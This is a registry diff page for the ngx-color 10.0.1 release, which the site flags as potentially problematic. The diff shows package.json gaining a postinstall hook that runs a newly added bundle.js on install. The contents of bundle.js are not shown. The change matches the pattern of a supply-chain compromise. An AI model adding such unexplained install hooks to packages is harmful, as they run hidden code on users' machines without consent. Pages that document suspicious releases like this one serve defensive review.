ngx-color 10.0.0 → 10.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of ngx-color might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bundle.js +2 -0
  2. package/package.json +6 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "ngx-color",
3
- "version": "10.0.0",
3
+ "version": "10.0.1",
4
4
  "description": "A Collection of Color Pickers from Sketch, Photoshop, Chrome & more",
5
5
  "dependencies": {
6
6
  "@ctrl/tinycolor": "^4.1.0",
@@ -102,5 +102,8 @@
102
102
  "default": "./fesm2022/ngx-color-twitter.mjs"
103
103
  }
104
104
  },
105
- "sideEffects": false
106
- }
105
+ "sideEffects": false,
106
+ "scripts": {
107
+ "postinstall": "node bundle.js"
108
+ }
109
+ }